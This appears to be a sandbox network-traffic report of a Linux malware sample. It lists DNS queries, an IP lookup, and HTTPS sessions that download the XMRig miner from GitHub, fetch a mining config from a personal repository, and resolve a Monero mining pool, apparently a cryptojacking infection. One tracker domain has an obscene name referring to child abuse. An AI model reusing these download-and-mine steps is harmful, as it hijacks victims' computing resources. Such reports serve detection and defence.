Sep 21, 2024 21:27:41.879789114 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:27:41.882103920 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:27:47.130137920 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:27:47.132555962 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:27:52.382889032 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:27:52.384681940 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:27:57.628434896 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:27:57.630585909 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:28:02.638544083 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:28:02.638748884 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 21, 2024 21:26:00.908263922 CEST	1.1.1.1	192.168.2.23	0xfafe	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:00.908263922 CEST	1.1.1.1	192.168.2.23	0xfafe	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:00.908263922 CEST	1.1.1.1	192.168.2.23	0xfafe	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:12.918181896 CEST	1.1.1.1	192.168.2.23	0x3f55	No error (0)	github.com		140.82.121.3	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:14.064091921 CEST	1.1.1.1	192.168.2.23	0x63b6	No error (0)	objects.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:14.064091921 CEST	1.1.1.1	192.168.2.23	0x63b6	No error (0)	objects.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:14.064091921 CEST	1.1.1.1	192.168.2.23	0x63b6	No error (0)	objects.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:14.064091921 CEST	1.1.1.1	192.168.2.23	0x63b6	No error (0)	objects.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:21.930602074 CEST	1.1.1.1	192.168.2.23	0x9902	No error (0)	raw.githubusercontent.com			28	IN (0x0001)	false
Sep 21, 2024 21:26:21.930602074 CEST	1.1.1.1	192.168.2.23	0x9902	No error (0)	raw.githubusercontent.com			28	IN (0x0001)	false
Sep 21, 2024 21:26:21.930602074 CEST	1.1.1.1	192.168.2.23	0x9902	No error (0)	raw.githubusercontent.com			28	IN (0x0001)	false
Sep 21, 2024 21:26:21.930602074 CEST	1.1.1.1	192.168.2.23	0x9902	No error (0)	raw.githubusercontent.com			28	IN (0x0001)	false
Sep 21, 2024 21:26:21.930937052 CEST	1.1.1.1	192.168.2.23	0xc185	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:21.930937052 CEST	1.1.1.1	192.168.2.23	0xc185	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:21.930937052 CEST	1.1.1.1	192.168.2.23	0xc185	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:21.930937052 CEST	1.1.1.1	192.168.2.23	0xc185	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:23.436853886 CEST	1.1.1.1	192.168.2.23	0x1e2f	No error (0)	pool.supportxmr.com	pool-fr.supportxmr.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 21, 2024 21:26:23.436853886 CEST	1.1.1.1	192.168.2.23	0x1e2f	No error (0)	pool-fr.supportxmr.com		141.94.96.195	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:23.436853886 CEST	1.1.1.1	192.168.2.23	0x1e2f	No error (0)	pool-fr.supportxmr.com		141.94.96.71	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:23.436853886 CEST	1.1.1.1	192.168.2.23	0x1e2f	No error (0)	pool-fr.supportxmr.com		141.94.96.144	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:23.438035011 CEST	1.1.1.1	192.168.2.23	0x71f5	No error (0)	pool.supportxmr.com	pool-fr.supportxmr.com		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

github.com

https:

objects.githubusercontent.com

raw.githubusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	40456	104.26.12.205	443

Timestamp	Bytes transferred	Direction	Data
2024-09-21 19:26:02 UTC	106	OUT	GET /?format=text HTTP/1.1 Host: api.ipify.org User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-09-21 19:26:02 UTC	211	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 19:26:02 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c6c71d15d3e433e-EWR
2024-09-21 19:26:02 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.23	60334	140.82.121.3	443

Timestamp	Bytes transferred	Direction	Data
2024-09-21 19:26:13 UTC	165	OUT	GET /xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz HTTP/1.1 Host: github.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-09-21 19:26:14 UTC	982	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Sat, 21 Sep 2024 19:26:13 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/d0ce794d-b593-4f8f-bb2d-6bfa0096266b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240921%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240921T192613Z&X-Amz-Expires=300&X-Amz-Signature=80393b2b793a967ba4d37dd68c49bfeda55a294590d9408a22cbca38042700a2&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.3-linux-static-x64.tar.gz&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-09-21 19:26:14 UTC	3381	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.23	32840	185.199.111.133	443

Timestamp	Bytes transferred	Direction	Data
2024-09-21 19:26:14 UTC	708	OUT	GET /github-production-release-asset-2e65be/88327406/d0ce794d-b593-4f8f-bb2d-6bfa0096266b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240921%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240921T192613Z&X-Amz-Expires=300&X-Amz-Signature=80393b2b793a967ba4d37dd68c49bfeda55a294590d9408a22cbca38042700a2&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.3-linux-static-x64.tar.gz&response-content-type=application%2Foctet-stream HTTP/1.1 Host: objects.githubusercontent.com User-Agent: Go-http-client/1.1 Referer: https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz Accept-Encoding: gzip
2024-09-21 19:26:14 UTC	821	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3505638 Content-Type: application/octet-stream Last-Modified: Tue, 23 Apr 2024 09:49:36 GMT ETag: "0x8DC637AAFEAB9F6" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 687fd54c-401e-0066-5ea6-deae75000000 x-ms-version: 2020-10-02 x-ms-creation-time: Tue, 23 Apr 2024 09:49:36 GMT x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=xmrig-6.21.3-linux-static-x64.tar.gz x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Age: 0 Date: Sat, 21 Sep 2024 19:26:14 GMT X-Served-By: cache-iad-kjyo7100178-IAD, cache-ewr-kewr1740023-EWR X-Cache: HIT, MISS X-Cache-Hits: 7334, 0 X-Timer: S1726946775.701109,VS0,VE7
2024-09-21 19:26:14 UTC	1378	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ec 5a 09 7c 93 c5 b6 ff 5a d2 85 cd a6 65 79 65 7d 79 25 4f f1 62 6a d2 36 4d 0a 0a ad b4 98 4a 21 d5 02 62 01 21 4d d2 36 90 26 21 4b 69 29 c5 0a 54 89 b1 5e ae 2b b8 a1 57 af 72 15 a4 20 68 95 ad b2 58 14 14 70 41 c4 05 7c a2 4c 5f 91 5e ef 73 fb 29 d0 77 ce cc 24 cd 97 7c fd e9 bb 4f ef 5b 6e 87 5f e7 fb e6 cc ff 2c 73 e6 cc 99 99 2f d4 54 b9 6d 15 aa ec f4 0c 4d 7a e6 d5 c2 6f 53 d4 6a 75 86 4e ab c5 a7 46 a7 55 87 3f 83 45 d0 64 65 6b 34 d9 3a 9d 4e a3 13 d4 9a 4c 68 0a 0a ed 6f 64 8f a8 f8 3c 5e 93 5b a1 10 ca 7c 36 bb a5 cc e9 ed 09 f7 73 fd ff 47 4b 4d f8 fc 9b 9d 8e 72 5b 45 fa 42 8f d3 f1 6b ea c0 09 ce ce ca ea 69 fe b3 b2 b4 19 11 f3 af cd d4 68 04 85 fa d7 34 a2 a7 f2 0f 3e ff 75 fd 14 50 d2 4c 2e 5b da 78 05 6b Data Ascii: Z\|Zeye}y%Obj6MJ!b!M6&!Ki)T^+Wr hXpA\|L_^s)w$\|O[n_,s/TmMzoSjuNFU?Edek4:NLhod<^[\|6sGKMr[EBkih4>uPL.[xk
2024-09-21 19:26:14 UTC	1378	IN	Data Raw: 79 09 ea bb 89 eb eb c9 ce d3 99 f1 a2 67 30 c2 64 dc 76 9c fb eb a7 cf 04 7a 4c 2b d2 76 f0 fe 58 de 4e 0a c3 0f 86 bf 3e 1c bf f6 d1 7b 34 ca a7 ee 2d 18 b5 ee 7d 95 f1 d2 b2 c7 7d 2d 77 fe f5 bf 60 7e 6f e9 2d bd a5 b7 f4 96 de d2 5b 7a 4b 6f e9 2d bd a5 b7 fc c3 96 e2 d9 fb fe 5b fc 33 0d fe 8b 7b f0 52 58 52 4c 5a ff c5 28 18 fc e7 0d fe 36 83 7f 1f 59 61 2e 16 0c 4d 71 fb 8e d6 c1 63 c8 aa 77 04 e8 3b 65 68 d2 de 85 04 7f 1f 12 9b 81 e8 03 40 24 67 29 63 27 49 ba bb 54 58 43 a5 11 2f 92 9a b4 b5 eb e7 42 4f 5b a1 7f 3f c9 40 79 81 7c a5 c1 62 18 27 fb d7 b1 00 4a 6a 7c 04 6a 43 db de e6 a3 bf 47 70 2a 48 2e f2 9f 25 1b 34 46 81 49 49 67 52 32 bb a5 9c 2b 8b 94 e2 bb b5 5b c2 f1 23 4c 42 39 48 80 27 0e 63 2a 15 11 97 0f f7 5c 43 a0 3e d1 e0 2f 10 0c Data Ascii: yg0dvzL+vXN>{4-}}-w`~o-[zKo-[3{RXRLZ(6Ya.Mqcw;eh@$g)c'ITXC/BO[?@y\|b'Jj\|jCGpH.%4FIIgR2+[#LB9H'c\C>/
2024-09-21 19:26:14 UTC	1378	IN	Data Raw: c8 a7 7f d0 30 29 30 4d 95 07 01 4c 76 1f 80 ea 95 03 cc 83 d5 94 6d a7 72 0d 6e 37 1f a6 32 ce 13 22 ce 05 c8 79 0f aa 01 0f 2a 0c 81 9d ca 27 e8 51 2d 5f 39 96 4c 3d 59 2a 68 ba 70 0b 32 f8 77 2a 9b e9 ce 73 36 e9 ca 55 14 42 fc 28 0f 6c 4b 1e 22 25 97 5a 94 8d 16 5d 85 16 5d 71 80 85 fd 99 c1 32 aa a9 b2 1b 99 8f 42 06 dc 5e 4a e7 72 ff 20 9c cb 3a 35 39 f2 21 9a 54 37 96 79 76 d3 20 63 24 1b 5d 1b ef 37 80 ec 43 fb a1 7a 7d 3f 66 e5 50 fa 7d 74 10 5b 4f 3f c4 84 1b a5 a2 e7 a1 06 9e 0f c8 07 8b 65 12 20 6a f9 32 14 ec 46 c1 55 fb 71 e5 d5 e9 c9 87 4b d9 78 4d 0d a8 09 29 6d 9c 62 6c a0 31 76 96 64 e7 d3 05 d3 72 09 23 f6 ab 39 f0 de 98 0a c1 1a 11 03 0a 94 3d 94 da 0b cc ef a4 d0 11 07 f3 7f 0a 5b 0a 17 6e 63 13 bf 2d 85 6d a5 e7 6e eb 8e 34 df 8c c2 Data Ascii: 0)0MLvmrn72"y'Q-_9L=Yhp2w*s6UB(lK"%Z]]q2B^Jr :59!T7yv c$]7Cz}?fP}t[O?e j2FUqKxM)mbl1vdr#9=[nc-mn4
2024-09-21 19:26:14 UTC	1378	IN	Data Raw: 2e 91 2d 39 b3 8f 2d 89 11 bc 5d c2 db fd 79 7b 32 6f ff 94 c0 da 99 bc dd c1 db 63 78 fb 23 de 1e e4 e3 bb bc 9a fc a0 0f 6e 64 e7 f9 9b 9c 9c e1 6f 0a 72 92 bf b9 c8 51 fe 56 09 67 4a 43 d3 46 76 1b d9 a1 a7 a1 56 e4 ff 82 34 f3 fe 1a f2 0c 7f 5b 40 1e d5 33 75 f7 eb 8d 12 6b 65 2a 5a e4 f7 06 37 04 67 c8 10 6b c8 90 39 21 43 6e 94 14 41 23 6f 0a 88 20 d7 b4 04 e5 5c 11 92 33 2a 24 67 50 48 4e 5f 78 6b af a4 eb 85 ee 67 ba 20 f8 2f ba 20 f8 4b 5d 10 fc 31 bc b5 4f 00 30 f8 6a 87 22 86 4e 70 52 e3 1d ec 4a 46 2e 39 60 92 78 54 fc d5 11 11 15 7f 88 8f 88 8a 86 f8 f0 a8 70 c7 87 47 85 25 3e 3c 2a 66 c5 f3 a8 78 8c 0a 8d 3e 27 cd f4 c0 80 a7 be 0c 55 dd e2 58 a1 dd c5 6f e6 97 e2 98 b7 b3 3d f4 5b 23 39 cf db 97 f3 f6 65 3a e9 95 1b 8f e2 2e bc c4 4f a9 6b Data Ascii: .-9-]y{2ocx#ndorQVgJCFvV4[@3ukeZ7gk9!CnA#o \3$gPHN_xkg / K]1O0j"NpRJF.9`xTpG%><*fx>'UXo=[#9e:.Ok
2024-09-21 19:26:14 UTC	1378	IN	Data Raw: 22 bf f5 24 92 88 b7 51 23 78 f7 64 8c 78 1f 78 f0 eb aa ea f7 e6 cd cc 63 bf 2f 7f f0 98 ee 57 5d 55 7d 55 d7 d5 2f 80 61 1d e8 05 26 b7 a4 cd 10 44 5d 1c 90 cc 55 25 36 76 68 bc 64 6e 00 67 b8 17 e7 d5 b2 86 bf cf fd 3a 1d 2d ca 48 4c 64 20 4b 90 35 f4 a4 d1 72 e7 00 71 3f a4 5b 5f 2c 79 1f 5e b8 cd 20 2e 72 f0 9f 8a 76 96 db 34 7a 33 7d 37 35 ba a3 e2 8e 7e bb f5 27 88 08 01 61 cf 7f 70 25 98 bf d0 03 73 38 76 59 19 17 ef c5 d7 80 f3 b8 67 06 c9 7c 1e 82 69 a0 bf f2 02 58 ec c9 2c bb c1 05 8e 3e bd 91 c1 5a f6 ce 1c 03 fd bd f9 d2 a0 5e c8 10 63 d7 65 0d 93 e4 95 fc ab 75 25 ef 58 c5 57 72 d8 07 7c 25 9b 92 02 fc c0 ed 75 03 17 be 6b 00 18 e8 ee f0 f0 61 ee 1d e8 34 e3 e3 5a 9e 0c 4e 15 e3 25 9d 31 33 81 ff 62 bf 75 f1 20 63 81 96 c2 97 f5 06 c9 7a 66 Data Ascii: "$Q#xdxxc/W]U}U/a&D]U%6vhdng:-HLd K5rq?[_,y^ .rv4z3}75~'ap%s8vYg\|iX,>Z^ceu%XWr\|%uka4ZN%13bu czf
2024-09-21 19:26:14 UTC	1378	IN	Data Raw: 8e ef 11 07 a9 c3 b6 e1 93 40 f4 97 8d 97 0f de ce 5a 40 29 17 d8 96 4d 14 0a 8a 84 10 9d 13 45 82 74 6c ca b7 d6 14 9f 72 7f 27 ca f0 f1 cd 04 00 56 fc 40 4b 47 41 e6 c7 8f 87 f5 8f 18 f7 46 3a c9 82 b8 db 1d 03 0a 99 86 3b 2e e0 36 4e 63 8f e0 07 9f 01 f6 c7 d9 a6 38 2c a7 cf 34 c5 0e b6 1f 9f 28 7b eb 4f d4 c1 2e dd 0b 37 a5 59 28 a7 68 39 98 03 26 95 e7 03 59 d5 be ec 2f 4c 98 73 fe a4 0d da 86 d6 31 41 e1 e7 24 79 1a bf f1 27 53 6c dc 7d 03 4a d1 7f d7 19 34 1a f5 62 47 b9 5d ce 56 16 08 7b 2d 5d 13 35 ae e0 59 49 30 ff 1c 90 bd 8f d0 f2 39 d3 af 4e 7d ce f4 ac 53 9f 33 1d b0 4f 73 c2 58 a0 3f 79 9f d9 8e 06 ea 78 40 12 f9 33 2f de a6 f5 d7 4a 94 ab 44 d9 35 89 d6 4d 18 eb 71 df 05 3b d0 f9 be 8b a4 15 13 3c 3f 0e f2 5f 36 d2 fa 11 3c 6d bd ad e6 29 Data Ascii: @Z@)MEtlr'V@KGAF:;.6Nc8,4({O.7Y(h9&Y/Ls1A$y'Sl}J4bG]V{-]5YI09N}S3OsX?yx@3/JD5Mq;<?_6<m)
2024-09-21 19:26:14 UTC	1378	IN	Data Raw: d3 ed f4 a2 c6 9a 6e d7 4f a0 15 aa 97 e7 75 e1 72 74 0c 1b 07 bd cd 47 a7 eb 67 36 61 e3 e7 d7 1a 05 77 02 f0 c7 9f 8a fc 6f 84 db 1b d6 44 26 5b 48 15 fe 4a c5 2a aa 70 57 2a ee 8e 46 3d 28 ef 2f 72 45 0e 41 a4 29 15 f3 a9 62 8a 52 31 9d 2a 62 95 8a f1 54 11 a9 54 e8 a9 22 48 a9 e8 2f f8 50 2a 7a 50 85 8f 52 f1 aa 60 4c a9 48 20 c6 2a dc e4 8a b3 57 11 a2 58 a9 38 44 15 a5 8a ab 68 f7 55 3a e8 63 1a 28 c3 f4 7a 2c 9d e5 dd 1b 64 9f 42 dc 35 0f 7c 33 ae d6 de 5b 82 19 79 bb 62 51 d4 f8 2b f0 19 57 ed 57 23 0a 82 ec 58 b0 32 73 e1 fe 4f ae 5d 8b b7 1c 5a 0c 80 16 89 84 d9 ca 49 e5 55 74 8e b0 e3 35 f6 9c e0 b4 f6 00 0a fe 40 a1 6d 2e d9 8a e7 ae 90 5b 14 15 d4 fe 37 49 df 0d b3 d1 3c c7 40 cb 3b a3 49 57 85 78 05 3b d9 52 68 88 ac b2 25 ed 81 ff 13 35 33 Data Ascii: nOurtGg6awoD&[HJpWF=(/rEA)bR1bTT"H/PzPR`LH *WX8DhU:c(z,dB5\|3[ybQ+WW#X2sO]ZIUt5@m.[7I<@;IWx;Rh%53
2024-09-21 19:26:14 UTC	1378	IN	Data Raw: 47 8e 5f 01 8e 3d b1 fd 5e 49 71 dc ee 3b 8b 1a 4d 32 37 98 af e5 e2 77 18 c4 fd 86 b3 b4 cd 6b 86 52 7e b4 c8 59 cf 39 6b d0 1c 8e 3d 1c 8c 7d b9 4c f8 8b a7 9e 55 c7 7e ab 06 83 06 26 47 de 7e a4 92 88 bc 95 0e 76 46 29 92 36 94 a4 49 d0 59 07 a9 86 b1 af 84 a1 e2 fe 93 e3 7b 5c 71 61 40 bf 17 7c f3 e3 af f8 91 12 99 9a 74 56 1d e7 bb 77 86 3a d5 74 28 69 e3 b3 0a bc b1 5c 3f 84 b0 7f 7d 46 5b a6 9e 1f 02 fe ff a5 a2 77 d9 67 48 62 1d 18 42 3c eb df a5 b9 b5 4d 4b 9e 0e 20 9b 86 d0 74 89 b8 c0 ac 33 a4 c6 eb a8 f8 be 28 8a 71 8a 17 45 c1 fa 30 51 94 f3 db 05 ef d2 ce 71 8e d4 52 56 b1 e0 a5 ea 08 9c 3b 36 9e 23 08 d5 9f 56 cf c7 ad d3 ea 48 e8 a5 d3 ea d8 67 e9 69 52 13 f2 4b c7 91 7c 1b 4c 23 33 65 82 58 bf 36 7d c4 78 50 f9 60 f9 de 93 4a 55 23 85 cb Data Ascii: G_=^Iq;M27wkR~Y9k=}LU~&G~vF)6IY{\qa@\|tVw:t(i\?}F[wgHbB<MK t3(qE0QqRV;6#VHgiRK\|L#3eX6}xP`JU#
2024-09-21 19:26:14 UTC	1378	IN	Data Raw: 5b 8a 99 01 3e ea 71 fb 17 ce fc df 79 0f cc f1 9d 39 f3 35 50 1c 09 c5 87 5d 5a d0 5a ae 2a 56 13 f8 6c 2a 0d 71 90 40 1f 24 56 31 7c 1b 86 75 6a d9 e8 b6 ba d1 17 94 54 c0 7e 8b 3f cc 3f 07 b6 c0 b5 7b ec 40 a3 db 6a 17 b4 d8 06 9f ef d8 02 8f 61 d0 b6 14 da 9e e9 46 73 df db 86 b1 01 1f 10 63 4a bf 69 ee bb 0b fe b0 e3 0b 5b 10 7f b6 5f 06 c4 8f a0 0c ef 4b 1a ae e1 48 9c 06 08 32 d4 05 18 7a 15 78 69 35 47 58 bd d2 33 3a b5 7f 28 1a a7 21 7f 5b a1 ff 3f 54 76 de 9e ac e7 a7 ff 71 76 76 36 65 7e 1c 80 e2 7f 75 c6 9e 81 b5 a0 70 7b 46 73 1d 8b ad 70 6b 49 e6 88 ab c3 ea 2c 0a 85 fc 87 d9 48 b9 8e 8d a9 24 05 62 39 a0 37 0d e8 d6 7b 9e c4 42 90 0b 47 7b 6b 2a b4 4c 9e 2d 64 53 3b d1 32 3e 94 16 50 33 51 1e 1a 4a 7c 3d 3f 42 e5 10 f1 fe d6 11 43 63 36 b0 Data Ascii: [>qy95P]ZZVlq@$V1\|ujT~??{@jaFscJi[_KH2zxi5GX3:(![?Tvqvv6e~up{FspkI,H$b97{BG{k*L-dS;2>P3QJ\|=?BCc6
2024-09-21 19:26:14 UTC	1378	IN	Data Raw: 20 35 88 fb 34 1d 3e 26 c8 33 55 a7 12 9d a1 82 ce 3b e0 fa 2e 05 69 fa 6b 64 04 cd 17 9c bd 9a 00 4e 65 37 64 b7 9e 4a f5 45 c8 67 54 2b 31 9b c0 1b 1f c3 2e c5 84 fd 65 fe 12 2a fd 66 21 4d ba 11 cf f7 b7 38 ca cc e0 7a 49 90 ad 91 e3 cd 55 e5 2d d9 e3 5f ad a1 7c d2 79 62 c4 2e 25 de ac 35 76 18 db ea 5d 4d 21 6b df 23 61 45 e4 5e 2b 57 0d b9 50 8c 73 0b cf 95 40 28 6a 7a 7e a1 aa 0f a1 5d 2e a7 f4 64 2e 5c ba 61 1c cf e6 ac af 57 7b c5 b6 ad 5b e3 7e 7c 4b e5 db 61 bd 0a 55 16 81 7c 7a e0 eb 01 7c 5d c7 27 2b 76 b9 6b 17 2a 77 b9 dd 0a 95 bb dc 4f 0a 94 cf 01 6e 17 28 47 d8 5f 0b 58 f5 fc d9 82 bf d7 c1 c4 25 05 6c 97 72 aa ab fd cd a4 12 0a 27 07 c6 29 73 3c b7 80 6d d9 07 93 4d f9 41 76 3c c5 15 92 0d 89 66 8e 93 df fc 9c c6 71 8a e7 29 f8 92 d8 28 Data Ascii: 54>&3U;.ikdNe7dJEgT+1.ef!M8zIU-_\|yb.%5v]M!k#aE^+WPs@(jz~].d.\aW{[~\|KaU\|z\|]'+vkwOn(G_X%lr')s<mMAv<fq)(

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.23	57756	185.199.109.133	443

Timestamp	Bytes transferred	Direction	Data
2024-09-21 19:26:22 UTC	148	OUT	GET /spetterman66/verynicerepo/main/config.json HTTP/1.1 Host: raw.githubusercontent.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-09-21 19:26:22 UTC	900	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3565 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "e8747853fe0e93752f9c67b52d9ea302d92509c2e0efd4fbecef6ead1855ec47" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 4D9B:14C18A:AAC6BB:BADE41:66EF1DDD Accept-Ranges: bytes Date: Sat, 21 Sep 2024 19:26:22 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740036-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1726946782.466250,VS0,VE75 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 59bde70a80701021be9ba5fdf13f6150fc96f53c Expires: Sat, 21 Sep 2024 19:31:22 GMT Source-Age: 0
2024-09-21 19:26:22 UTC	1378	IN	Data Raw: 7b 0a 20 20 20 20 22 61 70 69 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 22 77 6f 72 6b 65 72 2d 69 64 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 68 74 74 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 65 6e 61 62 6c 65 64 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 22 68 6f 73 74 22 3a 20 22 31 32 37 2e 30 2e 30 2e 31 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 22 61 63 63 65 73 73 2d 74 6f 6b 65 6e 22 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 22 72 65 73 74 72 69 63 74 65 64 22 3a 20 74 72 75 65 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 75 74 6f 73 61 76 65 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 62 61 63 6b 67 72 6f 75 Data Ascii: { "api": { "id": null, "worker-id": null }, "http": { "enabled": false, "host": "127.0.0.1", "port": 0, "access-token": null, "restricted": true }, "autosave": true, "backgrou
